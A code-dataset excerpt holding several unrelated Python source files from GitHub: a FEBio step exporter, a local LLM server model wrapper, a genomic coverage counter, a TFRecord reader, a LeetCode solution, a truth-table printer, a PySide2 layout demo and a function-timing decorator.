None\n\n\tdef add_step(self, name, parameters, use_must_point=False,\n\t\t\t\t restart_step=False,\n\t\t\t\t add_init_prestrain=False):\n\t\t\"\"\"Adds a step according to the dictionary format.\n\n\t\tParameters\n\t\t----------\n\n\t\tparameters: [dictionary] parameters of the step\n\n\t\tuse_must_point: [boolean] whether to use must points in the time\n\t\t\t\t\t\tstepper\n\t\trestart_step: [boolean] whether to use the restart capablity\n\t\tadd_init_prestrain: [boolean] add initial prestraint sectrion in case\n\t\t\t\t\t\t\tthe prestrain plugin is used\n\n\t\tReturns\n\t\t-------\n\n\t\tstep: [ET.SubElement] the step xml root\n\n\t\tloadcurve_id: [integer] (default None) the must point loadcurve_id\n\t\t\"\"\"\n\n\t\tif self.step_counter > 1:\n\t\t\tif self.parent.step is None:\n\t\t\t\tself.step = ET.SubElement(self.parent.root, 'Step')\n\t\t\tif not restart_step:\n\t\t\t\tself.root = ET.SubElement(\n\t\t\t\t\tself.step, 'step',\n\t\t\t\t\tattrib={'id': str(self.parent.loadcurve_id + 1),\n\t\t\t\t\t\t\t'name': name})\n\t\t\telse:\n\t\t\t\t# TODO implement restart step\n\t\t\t\t# raise RuntimeError(\"Not implemented yet! \")\n\t\t\t\tself.root = ET.SubElement(self.parent.root, 'Step',\n\t\t\t\t\t\t\t\t\t\t attrib={'type': 'solid'})\n\t\t\tself.control = ET.SubElement(self.root, 'Control')\n\t\telse:\n\t\t\tif self.parent.control is None:\n\t\t\t\tself.parent.control = ET.SubElement(\n\t\t\t\t\tself.parent.root, 'Control')\n\t\t\tself.control = self.parent.control\n\t\t\tself.root = self.control\n\n\t\tif add_init_prestrain:\n\t\t\tself.initial = ET.SubElement(self.root, 'Initial')\n\t\tfor key, value in parameters.items():\n\t\t\tif key == 'time_stepper':\n\t\t\t\ttime_stepper = ET.SubElement(self.control, key)\n\t\t\t\tfor sub_key, sub_value in value.items():\n\t\t\t\t\tif use_must_point and sub_key == 'dtmax':\n\t\t\t\t\t\titem = ET.SubElement(\n\t\t\t\t\t\t\ttime_stepper, sub_key,\n\t\t\t\t\t\t\tattrib={'lc': str(self.parent.loadcurve_id + 1)})\n\t\t\t\t\t\t# item.text = ''\n\t\t\t\t\t\tself.loadcurve_id = self.parent.loadcurve_id + 1\n\t\t\t\t\t\tself.parent.loadcurve_id += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\titem = ET.SubElement(time_stepper, sub_key)\n\t\t\t\t\t\titem.text = str(sub_value)\n\t\t\telif key == 'analysis':\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = value.upper()\n\t\t\telif key == 'restart':\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = str(1)\n\t\t\t\titem.set('file', value)\n\t\t\telif key == 'initial':\n\t\t\t\titem = ET.SubElement(self.initial, 'ic',\n\t\t\t\t\t\t\t\t\t attrib={'type': 'prestrain'})\n\t\t\t\titem1 = ET.SubElement(item, 'init')\n\t\t\t\titem1.text = str(value['init'])\n\t\t\t\titem2 = ET.SubElement(item, 'reset')\n\t\t\t\titem2.text = str(value['reset'])\n\t\t\telif key == 'solver':\n\t\t\t\tsolver = ET.SubElement(self.control, key)\n\t\t\t\tfor sub_key, sub_value in value.items():\n\t\t\t\t\tsubitem = ET.SubElement(solver, sub_key)\n\t\t\t\t\tsubitem.text = str(sub_value)\n\t\t\telse:\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = str(value)\n\n\t\treturn self.root, self.loadcurve_id\n\n\tdef add_restart_step(self, name, parameters, use_must_point=False):\n\t\t\"\"\"\n\t\tFunction that adds a step to the restart file\n\t\tReturns\n\t\t-------\n\n\t\t\"\"\"\n\t\tif self.step_counter > 1:\n\t\t\tif self.parent.step is None:\n\t\t\t\tself.step = ET.SubElement(self.parent.root, 'Step')\n\n\t\t\telse:\n\t\t\t\tself.step = self.parent.step\n\n\t\t\tself.root = ET.SubElement(self.step, 'step',\n\t\t\t\t\t\t\t\t\t attrib={'id': str(\n\t\t\t\t\t\t\t\t\t\t self.parent.loadcurve_id + 1),\n\t\t\t\t\t\t\t\t\t\t\t 'name': name,\n\t\t\t\t\t\t\t\t\t\t\t 'type': \"solid\"})\n\t\t\tself.control = ET.SubElement(self.root, 'Control')\n\n\t\tfor key, value in parameters.items():\n\t\t\tif key == 'time_stepper':\n\t\t\t\ttime_stepper = ET.SubElement(self.control, key)\n\t\t\t\tfor sub_key, sub_value in value.items():\n\t\t\t\t\tif use_must_point and sub_key == 'dtmax':\n\t\t\t\t\t\titem = ET.SubElement(\n\t\t\t\t\t\t\ttime_stepper, sub_key,\n\t\t\t\t\t\t\tattrib={'lc': str(self.parent.loadcurve_id + 1)})\n\t\t\t\t\t\t# item.text = ''\n\t\t\t\t\t\tself.loadcurve_id = self.parent.loadcurve_id + 1\n\t\t\t\t\t\tself.parent.loadcurve_id += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\titem = ET.SubElement(time_stepper, sub_key)\n\t\t\t\t\t\titem.text = str(sub_value)\n\t\t\telif key == 'analysis':\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = value.upper()\n\t\t\telif key == 'restart':\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = str(1)\n\t\t\t\titem.set('file', value)\n\t\t\telif key == 'initial':\n\t\t\t\titem = ET.SubElement(self.initial, 'ic',\n\t\t\t\t\t\t\t\t\t attrib={'type': 'prestrain'})\n\t\t\t\titem1 = ET.SubElement(item, 'init')\n\t\t\t\titem1.text = str(value['init'])\n\t\t\t\titem2 = ET.SubElement(item, 'reset')\n\t\t\t\titem2.text = str(value['reset'])\n\t\t\telif key == 'solver':\n\t\t\t\tsolver = ET.SubElement(self.control, key)\n\t\t\t\tfor sub_key, sub_value in value.items():\n\t\t\t\t\tsubitem = ET.SubElement(solver, sub_key)\n\t\t\t\t\tsubitem.text = str(sub_value)\n\t\t\telse:\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = str(value)\n\n\t\treturn self.root, self.loadcurve_id\n\n\t@staticmethod\n\tdef get_default_step_parameters():\n\t\t\"\"\"Gets the default step parameters.\n\n\t\tReturns\n\t\t-------\n\n\t\tparameters: [dictionary]\n\n\t\t\"\"\"\n\t\treturn copy.copy({\n\t\t\t'analysis': 'static',\n\t\t\t'time_steps': 20,\n\t\t\t'step_size': 0.05,\n\t\t\t'solver': {\n\t\t\t\t'max_refs': 25,\n\t\t\t\t# 'max_refs': 15,\n\t\t\t\t'max_ups': 0,\n\t\t\t\t'diverge_reform': 1,\n\t\t\t\t'reform_each_time_step': 1,\n\t\t\t\t'dtol': 0.01,\n\t\t\t\t'etol': 0.1,\n\t\t\t\t'rtol': 0,\n\t\t\t\t'lstol': 0.9,\n\t\t\t\t'min_residual': 0.001,\n\t\t\t\t'qnmethod': 'BROYDEN',\n\t\t\t\t'rhoi': -2,\n\t\t\t\t'symmetric_stiffness': 0,\n\t\t\t},\n\t\t\t'time_stepper': {\n\t\t\t\t'dtmin': 0.00000001,\n\t\t\t\t'dtmax': 0.05,\n\t\t\t\t'max_retries': 30,\n\t\t\t\t'opt_iter': 10,\n\t\t\t\t# 'aggressiveness': 0\n\t\t\t}\n\t\t\t# 'alpha': 1,\n\t\t\t# 'beta': 0.25,\n\t\t\t# 'gamma': 0.5\n\t\t})\n","repo_name":"konris87/febio_exporter","sub_path":"febio_exporter/step.py","file_name":"step.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"36235464063","text":"import logging\n\n# Import the ibm-generative-ai library and local server extension\nfrom genai.extensions.localserver import CustomModel, LocalLLMServer\nfrom genai.model import Model\nfrom genai.schemas import GenerateParams, GenerateResult, TokenizeResult, TokenParams\nimport torch\n\nprint(torch.cuda.is_available())\n# This example uses the transformers library, please install using:\n# pip install transformers torch sentencepiece\ntry:\n from transformers import T5ForConditionalGeneration, T5Tokenizer, AutoModelForCausalLM, AutoTokenizer\nexcept ImportError:\n raise ImportError(\n \"\"\"\nCould not import transformers which is needed for this example.\nPlease install using: pip install transformers torch sentencepiece\n\"\"\"\n )\n\n\nlogger = logging.getLogger(__name__)\n\n# Create your custom model\n\n\nclass FlanT5Model(CustomModel):\n model_id = \"mistralai/Mistral-7B-Instruct-v0.1\"\n\n def __init__(self):\n model_id = \"mistralai/Mistral-7B-Instruct-v0.1\"\n logger.info(\"Initialising my custom flan-t5-base model\")\n self.tokenizer = AutoTokenizer.from_pretrained(model_id)\n self.model = AutoModelForCausalLM.from_pretrained(model_id, resume_download=True)\n logger.info(\"flan-t5-base is ready!\")\n\n def generate(self, input_text: str, params: GenerateParams) -> GenerateResult:\n logger.info(f\"Calling generate on: {input_text}\")\n input_ids = self.tokenizer(input_text, return_tensors=\"pt\").input_ids\n response = self.model.generate(input_ids, max_new_tokens=params.max_new_tokens)\n\n genai_response = GenerateResult(\n generated_text=self.tokenizer.decode(response[0]),\n generated_token_count=response.shape[1],\n input_token_count=input_ids.shape[1],\n stop_reason=\"\",\n )\n logger.info(f\"Response to {input_text} was: {genai_response}\")\n\n return genai_response\n\n def tokenize(self, input_text: str, params: TokenParams) -> TokenizeResult:\n logger.info(f\"Calling tokenize on: {input_text}\")\n tokenised = self.tokenizer(input_text).input_ids\n tokens = self.tokenizer.convert_ids_to_tokens(tokenised)\n result = TokenizeResult(token_count=len(tokens))\n if params.return_tokens is True:\n result.tokens = tokens\n return result\n","repo_name":"adam-pawelek/llm-chat-bot","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21828760181","text":"import os\nimport sys\nimport argparse\nimport gzip\n\nCHRS_INCLUDE=set(['1','2','3','4','5','6','7','8','9','10',\n '11','12','13','14','15',\n '16','17','18','19','20',\n '21','22','X'])\n\ndef main():\n args = parse_args()\n print(\"loading genders from sampleped file...\")\n sampleped_fh = open(args.sampleped_file, \"r\")\n genders = dict()\n for line in sampleped_fh:\n data = line.rstrip().split()\n genders[ data[1] ] = int( data[4] )\n sampleped_fh.close()\n\n print(\"loading parent .lis file...\")\n rgn_cov_tree = load_p_lis(args.parent_lis_filename)\n if args.samplecovpaths_file == \"stdin\":\n rgncov_filepaths_fh = sys.stdin\n else:\n rgncov_filepaths_fh = open(args.samplecovpaths_file, \"r\")\n print(\"loading rgn filepaths...\")\n rgncov_filepaths = load_rgncov_filepaths( rgncov_filepaths_fh, genders )\n \n for gender in (1,2):\n for rgncov_filepath in rgncov_filepaths[ gender ]:\n print(\"loading \"+rgncov_filepath+\" to coverage tree..\")\n rgn_cov_tree = load_rgncov( rgncov_filepath, gender, rgn_cov_tree )\n print(\"writing per-nucleotide coverage stats to output file\")\n write_cov_samples_per_pos(rgn_cov_tree, \n args.parent_lis_filename,\n args.out_filename,\n full_loc_info=args.full_loc_info,\n buff_size=args.buff_size)\n return\n\ndef parse_args():\n ''' load user-defined arguments and options '''\n desc='''for each position in parent region file, return the number of samples\n from list of paths to coverage files where coverage is sufficient \n for de novo mutation analysis '''\n parser = argparse.ArgumentParser(prog=\"cov_samples_per_pos\", \n description=desc)\n parser.add_argument('--includeY', action=\"store_true\", dest=\"includeY\", \n default=False, help='include Y chromosome genes')\n parser.add_argument('--full-loc-info',action=\"store_true\",default=False,\n help=\"in output, write cols 1-3 for loc info.\")\n parser.add_argument('--buff-size',action=\"store\",type=int,default=50000,\n help=\"size of buffer in writing to output file\")\n parser.add_argument('parent_lis_filename', action=\"store\", \n help='.lis file with all nucleotides to assess for coverage')\n parser.add_argument('samplecovpaths_file', action=\"store\", \n help='table with IID as col1 and col2 as path to ' + \\\n 'per-trio coverage files representing assessable sites')\n parser.add_argument('sampleped_file',action=\"store\",\n help='ped file with needed gender info')\n parser.add_argument('out_filename', action=\"store\", help='name of analysis output file')\n args = parser.parse_args(sys.argv[1:])\n return args\n\ndef load_rgncov_filepaths(rgncov_filepaths_fh, genders_dict):\n ''' make sure rgncov_filepath points to an existing file and then add it to list of \n files to assess, otherwise halt program '''\n rgncov_filepaths = {1:[], 2:[]}\n for line in rgncov_filepaths_fh:\n rgncov_filepath = line.rstrip()\n if os.path.isfile(rgncov_filepath) == False:\n print(\"rgncov file \"+rgncov_filepath+\" does not exist. Exiting...\")\n sys.exit(1)\n filename_base = os.path.basename(rgncov_filepath)\n fid_iid = filename_base.split(\".\")[0]\n [fid, iid] = fid_iid.split(\"_\")\n gender = genders_dict[ iid ]\n rgncov_filepaths[ gender ].append( rgncov_filepath )\n return rgncov_filepaths\n\n\ndef load_p_rgn(p_rgn_fh):\n ''' load parent genomic intervals into tree of the following structure :\n /\\\n gene\n \\\n chrom\n \\\n pos\n '''\n rgn_cov_tree = {}\n i = 0\n for line in p_rgn_fh:\n i += 1\n data = line.rstrip().split()\n try:\n gene,chrom,intervals_str = data[:3]\n intervals = load_intervals_str(intervals_str, i)\n except:\n print(\"malformed rgn file entry at line \" + str(i) + \". Exiting...\")\n sys.exit(1)\n if chrom not in rgn_cov_tree: rgn_cov_tree[chrom] = {}\n if gene not in rgn_cov_tree[chrom]: rgn_cov_tree[chrom][gene] = {}\n for interval in intervals:\n for pos in xrange(interval[0], interval[1]+1): \n rgn_cov_tree[chrom][gene][pos] = 0\n print(i)\n\n p_rgn_fh.close()\n return rgn_cov_tree\n\ndef load_p_lis(parent_lis_filename, skip_header=True):\n ''' load parent genomic sites from .lis file into tree of \n the following structure :\n /\\\n gene\n \\\n chrom\n \\\n pos\n '''\n\n p_lis_fh = open(parent_lis_filename, \"r\")\n rgn_cov_tree = {}\n i = 0\n for line in p_lis_fh:\n i += 1\n if i == 1 and skip_header == True: continue\n data = line.rstrip().split()\n try:\n gene,chrom,pos = data[:3]\n pos = int(pos)\n except:\n print(\"malformed .lis file entry at line \" + str(i) + \". Exiting...\")\n sys.exit(1)\n if chrom not in rgn_cov_tree: rgn_cov_tree[chrom] = {}\n if gene not in rgn_cov_tree[chrom]: rgn_cov_tree[chrom][gene] = {}\n if pos not in rgn_cov_tree[chrom][gene]:\n rgn_cov_tree[chrom][gene][pos] = 0\n \n p_lis_fh.close()\n return rgn_cov_tree\n\ndef load_intervals_str(intervals_str, i = -1):\n ''' convert rgn formatted intervals to a list of interval start-stops '''\n intervals_str = intervals_str[1:-1]\n if len(intervals_str) == 0:\n return []\n intervals = intervals_str.split(\",\")\n for j in xrange(len(intervals)):\n intervals[j] = intervals[j].split(\"..\")\n intervals[j] = [int(intervals[j][0]), int(intervals[j][1])]\n #try:\n # intervals[j] = [int(intervals[j][0]), int(intervals[j][1])]\n #except:\n # print(\"malformed intervals at line \" + str(i) + \". Exiting...\")\n # sys.exit(1)\n return intervals\n\ndef load_rgncov(rgncov_filename, rgncov_gender, \n rgn_cov_tree, chrom_gene = True):\n ''' count sufficiently covered nucleotides from parent region file using trio-level\n rgn-cov file, store to rgn_cov_tree, return rgn_cov_tree '''\n global CHRS_INCLUDE\n if rgncov_filename.find(\".gz\") != -1:\n rgncov_fh = gzip.open(rgncov_filename, \"rb\")\n else:\n rgncov_fh = open(rgncov_filename, \"r\")\n i = 0\n\n # data struct to keep track of repeated chrom/pos passed in rgn file\n cov_chrpos=dict()\n\n for line in rgncov_fh:\n i += 1\n\n data = line.rstrip().split()\n if chrom_gene == True:\n chrom,gene,intervals_str = data[:3]\n else:\n gene,chrom,intervals_str = data[:3]\n intervals = load_intervals_str(intervals_str, i)\n if chrom not in CHRS_INCLUDE: continue\n if (chrom==\"X\" or chrom==\"Y\") and rgncov_gender==1:\n n_copies = 2\n else:\n n_copies = 2\n gene_node = rgn_cov_tree[chrom][gene]\n if chrom not in cov_chrpos: cov_chrpos[chrom]=set()\n for interval in intervals:\n for pos in range(interval[0], interval[1]+1):\n if pos not in cov_chrpos[chrom]:\n gene_node[pos] += n_copies\n cov_chrpos[chrom].add(pos)\n rgncov_fh.close()\n return rgn_cov_tree\n\ndef write_cov_samples_per_pos(rgn_cov_tree, \n parent_lis_filename,\n out_filename, delim=\"\\t\",\n buff_size=50000,\n full_loc_info=False,\n skip_header=True):\n ''' print number of samples sufficiently covered at each\n gene-chrom-pos in input parent rgn file '''\n out_fh = open(out_filename, \"w\")\n out_fh.write(\"\")\n out_fh.close()\n \n p_lis_fh = open(parent_lis_filename, \"r\")\n b = 0\n\n i = 0\n b = 0\n out_fh = open(out_filename, \"a\")\n for line in p_lis_fh:\n i += 1\n if i == 1 and skip_header == True: continue\n data = line.rstrip().split()\n gene,chrom,pos = data[:3]\n pos = int(pos)\n n_samples_cov = rgn_cov_tree[chrom][gene][pos]\n if full_loc_info == False:\n out_row_str = str( n_samples_cov )\n else:\n out_row = [gene,chrom,pos,n_samples_cov]\n out_row_str = delim.join([str(item) for item in out_row])\n out_fh.write(out_row_str + \"\\n\")\n b += 1\n if b == buff_size:\n out_fh.close()\n out_fh = open(out_filename, \"a\")\n out_fh.close()\n return \n\nif __name__ == '__main__':\n main()\n","repo_name":"Halvee/OCD_WES_analysis_full_NatureNeuro2020","sub_path":"src/trio_coverage/cov_samples_per_pos.py","file_name":"cov_samples_per_pos.py","file_ext":"py","file_size_in_byte":8898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25693789970","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport tensorflow as tf\nfrom libs import decode_block\n\nclass SketchReader(object):\n \"\"\"TFRecords data reader.\n Read data from TFRecord data, based on a multi-thread, queue-based input pipeline.\n \"\"\"\n\n def __init__(self, tfrecord_list, raw_size, shuffle=False, num_threads=1, batch_size=1,\n nb_epoch=None, with_key=False):\n \"\"\"Reader initializer.\n\n Args:\n :param tfrecord_list: tfrecord file lists.\n :param raw_size: decode raw data size.\n :param shuffle: shuffle data flag.\n :param num_threads: number of threads to read data.\n :param batch_size: batch size.\n :param nb_epoch: number of epochs, 1 if final test phase\n :param with_key: the key from extracted key-value pair.\n \"\"\"\n self._reader = None\n self._queue = None\n self._tfrecord_list = tfrecord_list\n self._raw_size = raw_size\n self._shuffle = shuffle\n self._nb_threads = num_threads\n self._batch_size = batch_size\n self._nb_epoch = nb_epoch\n self._with_key = with_key\n\n def _read_raw(self):\n \"\"\"Read raw data from TFRecord.\n\n Returns:\n :return: data list [input_raw, label_raw].\n \"\"\"\n # 生成TFRecord Reader\n self._reader = tf.compat.v1.TFRecordReader()\n # 读取tfrecord文件,读取得到的是一个序列化的example\n _, serialized_example = self._reader.read(self._queue)\n # print(\"序列化的example:serialized_example:\", serialized_example)# Tensor(\"ReaderReadV2:1\", shape=(), dtype=string)\n # 解析得到的系列化example,需要按照存储时的格式还原features,必须写明features内的字典的键索引得到特定的数据!\n features = tf.io.parse_single_example(serialized=serialized_example,\n features={\n 'name': tf.io.FixedLenFeature([], tf.string),\n 'block': tf.io.FixedLenFeature([], tf.string)\n })\n\n input_raw, label_raw = decode_block(features['block'], tensor_size=self._raw_size)#decode block输入进去的是features['block'],这个是一个字符串,是对训练集中Sketch和3D图形图片的压缩 ;输出的是两个代表inputdata和label的tensor\n # decode_block的输入\n # print(\"features['name']打印值\", features['name'])# Tensor(\"ParseSingleExample/ParseExample/ParseExampleV2:1\", shape=(), dtype=string)\n # print(\"features['block']打印值\", features['block'])#features['block']打印值 Tensor(\"ParseSingleExample/ParseExample/ParseExampleV2:0\", shape=(), dtype=string)\n if self._with_key:\n return input_raw, label_raw, features['name']\n # print(\"input_raw打印值\", input_raw)#Tensor(\"DecodeBlock:0\", shape=(256, 256, 6), dtype=float32)\n # print(\"label_raw打印值\", label_raw)#Tensor(\"DecodeBlock:1\", shape=(256, 256, 17), dtype=float32)\n return input_raw, label_raw\n\n def _batch_data(self):\n \"\"\"Assemble data into one batch.\n\n Returns:\n :return: batch data with shape [N, H, W, C].\n \"\"\"\n # 生成文件队列\n self._queue = tf.compat.v1.train.string_input_producer(self._tfrecord_list,\n num_epochs=self._nb_epoch,\n shuffle=self._shuffle)\n\n example = self._read_raw()\n\n queue_buf = 500\n cap_shuffle = queue_buf + 3 * self._batch_size\n cap_noShuffle = (self._nb_threads + 1) * self._batch_size\n\n if self._shuffle:\n batch_data = tf.compat.v1.train.shuffle_batch(\n tensors=example,\n batch_size=self._batch_size,\n num_threads=self._nb_threads,\n capacity=cap_shuffle,\n min_after_dequeue=queue_buf\n )\n else:\n batch_data = tf.compat.v1.train.batch(\n tensors=example,\n batch_size=self._batch_size,\n num_threads=self._nb_threads,\n capacity=cap_noShuffle\n )\n return batch_data\n\n def next_batch(self):\n \"\"\"Load next batch\n\n Returns:\n :return: next batch data.\n \"\"\"\n return self._batch_data()\n","repo_name":"Doggerlas/Computer-Graphics","sub_path":"PROJECT/Sketch-CNN/CODE/network/script/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"6767487839","text":"import itertools\nimport re\n\n\ndef truth_table(expression):\n # Define the variables in the expression\n variables = sorted(set(re.findall(r'\\b[A-Za-z]\\b', expression)))\n\n # Determine the width of the longest variable\n width = max(len(v) for v in variables)\n\n # Print the header row\n print('+' + '+'.join(['-' * (width + 2) for v in variables]) + '+--------+')\n print('| ' + ' | '.join(v.center(width) for v in variables) + ' | Result |')\n print('+' + '+'.join(['-' * (width + 2) for v in variables]) + '+--------+')\n\n # Generate all possible combinations of values for the variables\n for values in itertools.product([True, False], repeat=len(variables)):\n # Create a dictionary mapping variables to values\n assignment = dict(zip(variables, values))\n\n # Evaluate the expression under this assignment of values\n result = eval(expression, assignment)\n\n # Print the values of the variables and the result of the expression\n print('| ' + ' | '.join(str(int(v)).rjust(width) for v in values) + ' | ' + str(result).ljust(7) + '|')\n\n # Print the footer row\n print('+' + '+'.join(['-' * (width + 2) for v in variables]) + '+--------+')\n\n\ntruth_table(\"(A and B) or (C and D)\")\n","repo_name":"chrisoeser/Compute-Truth-Tables","sub_path":"truth_table.py","file_name":"truth_table.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22962127122","text":"\"\"\"\nhttps://leetcode.com/problems/majority-element/\n\nGiven an array nums of size n, return the majority element.\n\nThe majority element is the element that appears more \nthan ⌊n / 2⌋ times. You may assume that the majority \nelement always exists in the array.\n\nExample 1:\nInput: nums = [3,2,3]\nOutput: 3\n\nExample 2:\nInput: nums = [2,2,1,1,1,2,2]\nOutput: 2\n\nConstraints:\nn == nums.length\n1 <= n <= 5 * 10^4\n-2^31 <= nums[i] <= 2^31 - 1\n \nFollow-up: Could you solve the problem in \nlinear time and in O(1) space?\n\"\"\"\nfrom typing import List\nfrom collections import Counter\n\n\ndef hashmap(nums: List[int]) -> int:\n # Time complexity: O(n)\n # Space complexity: O(n)\n count = {}\n for num in nums:\n count[num] = count.get(num, 0) + 1\n\n max_elem, max_count = None, float(\"-inf\")\n for k, v in count.items():\n if v > max_count:\n max_elem, max_count = k, v\n\n return max_elem\n\n\ndef hashmap2(nums: List[int]) -> int:\n # Time complexity: O(n)\n # Space complexity: O(n)\n count = Counter(nums)\n return max(count.keys(), key=count.get)\n\n\ndef moore_voting(nums: List[int]) -> int:\n # Time complexity: O(n)\n # Space complexity: O(1)\n elem, count = nums[0], 1\n n = len(nums)\n for i in range(1, n):\n if count == 0:\n elem, count = nums[i], 1\n elif nums[i] == elem:\n count += 1\n else:\n count -= 1\n\n return elem\n\n\nif __name__ == \"__main__\":\n print(\"-\" * 60)\n print(\"Majority element\")\n print(\"-\" * 60)\n\n test_cases = [\n ([1], 1),\n ([1, 2, 1], 1),\n ([1, 2, 1, 2, 1], 1),\n ([1, 2, 1, 2, 2, 22, 2, 1, 2], 2),\n ]\n\n for nums, solution in test_cases:\n\n print(f\"Array: {nums}\")\n\n result = hashmap(nums)\n output = f\" hashmap = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (55 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = hashmap2(nums)\n output = f\" hashmap2 = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (55 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = moore_voting(nums)\n output = f\" moore_voting = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (55 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n print()\n","repo_name":"daalgi/algorithms","sub_path":"hashmaps/majority_element.py","file_name":"majority_element.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23286831771","text":"import sys\nfrom PySide2 import QtWidgets, QtGui\n\nfrom MainWindow import Ui_MainWindow\n\n\nclass MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setupUi(self)\n\n # Further location UI customization\n self.actionQuit.setShortcut(QtGui.QKeySequence.Quit)\n self.actionQuit.triggered.connect(self.close)\n\n self.actionAdd.triggered.connect(self.Add)\n self.actionClear.triggered.connect(self.Clear)\n\n vlayout = self.findChild(QtWidgets.QVBoxLayout, \"verticalLayout\")\n # vlayout.addWidget(QtWidgets.QLabel(\"Parameters\"))\n\n def Add(self):\n print('Adding')\n self.verticalLayout.addWidget(QtWidgets.QLabel(\"Adding\"))\n\n def Remove(self):\n print('Remove')\n child = self.verticalLayout.takeAt(0)\n if child:\n self.verticalLayout.removeItem(child)\n del child\n self.verticalLayout.update()\n\n def Clear(self):\n print('Clear number of widgets = {}'.format(self.verticalLayout.count()))\n child = self.verticalLayout.takeAt(0)\n while child:\n self.verticalLayout.removeItem(child)\n del child\n child = self.verticalLayout.takeAt(0)\n self.verticalLayout.update()\n\napp = QtWidgets.QApplication(sys.argv)\n\nwindow = MainWindow()\nwindow.show()\napp.exec_()\n\n","repo_name":"nyue/QtQuestions","sub_path":"PySide2/layout/add_delete_items_vboxlayout/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11597592662","text":"import time\nfrom typing import Callable, Dict, List, Union, Any\n\n\nTIMINGS: Union[None, \"Timings\"] = None\n\n\ndef config_timings_value():\n \"\"\"Innitialise the TIMINGS value\"\"\"\n global TIMINGS\n TIMINGS = Timings()\n\n\nclass Timings:\n \"\"\"Track the timings of values that are marked with the time_function decorator\"\"\"\n\n FRAME_NUMBER: int = 0\n\n __named_timing: \"_TimedValue\"\n named_timings: Dict[str, \"Timings\"]\n __frame_number: int\n\n def __init__(self, timing=None):\n self.named_timing = timing\n self.named_timings = dict()\n\n def add(\n self,\n value: float,\n *names: str\n ):\n \"\"\"Add a value to a named timing\"\"\"\n if len(names) == 0:\n self.named_timing.add_value(value, self.FRAME_NUMBER)\n return\n name = names[0]\n if name in self.named_timings:\n self.named_timings[name].add(value, *names[1:])\n else:\n self.named_timings[name] = Timings(_TimedValue())\n self.named_timings[name].add(value, *names[1:])\n\n def increase_frame_count(self):\n Timings.FRAME_NUMBER += 1\n\n def get_time_summary(self, total_upper_time: float = None) -> str:\n \"\"\"Get the percentages of all the named timings that are saved\"\"\"\n summary = \"\"\n timings = {}\n for name, timing in self.named_timings.items():\n average_time = timing.named_timing.get_average_value()\n timings[name] = (average_time, timing.get_time_summary(average_time))\n total_time_timed = sum(value[0] for value in timings.values()) if total_upper_time is None else total_upper_time\n if total_time_timed == 0:\n return \"\"\n for name, value_summary in timings.items():\n summary += f\"{name}: ({(value_summary[0] / total_time_timed) * 100:.2f}%)\\n\"\n for line in value_summary[1].split(\"\\n\"):\n if len(line) == 0:\n continue\n summary += f\" - {line}\\n\"\n return summary\n\n\nclass _TimedValue:\n \"\"\"Track a list of a certain length of time it took to run a function per frame. All calls in one frame are put\n together\"\"\"\n MAX_SAVED_TIMINGS = 100 # a list of timings saved for each saved varaible\n\n time_values: List[Union[float, None]]\n __additon_index: int\n __frame_nmr: int\n\n def __init__(self):\n self.time_values = [None for _ in range(self.MAX_SAVED_TIMINGS)]\n self.__addition_index = 0\n self.__frame_nmr = -1\n\n def add_value(\n self,\n value: float,\n actual_frame_number: int,\n ):\n \"\"\"Add a value at the addition_index (cycles from 0-MAX_SAVED_TIMINGS to make it a bit more efficient) and add\n the value up if within the same frame otherwise put in the next slot\"\"\"\n if actual_frame_number != self.__frame_nmr:\n self.__frame_nmr = actual_frame_number\n self.time_values[self.__addition_index] = value\n self.__addition_index += 1\n if self.__addition_index > self.MAX_SAVED_TIMINGS - 1:\n self.__addition_index = 0\n else:\n self.time_values[self.__addition_index - 1] += value\n\n def get_average_value(self) -> float:\n \"\"\"Get the average value of the time_values\"\"\"\n valid_values = [value for value in self.time_values if value is not None]\n return sum(valid_values) / len(valid_values)\n\n\ndef time_function(*time_names: str) -> Any:\n \"\"\"Time a function decorated with this\"\"\"\n def function_decorator(func: Callable):\n def wrapper(*args, **kwargs):\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n global TIMINGS\n TIMINGS.add(end - start, *time_names)\n return result\n return wrapper\n return 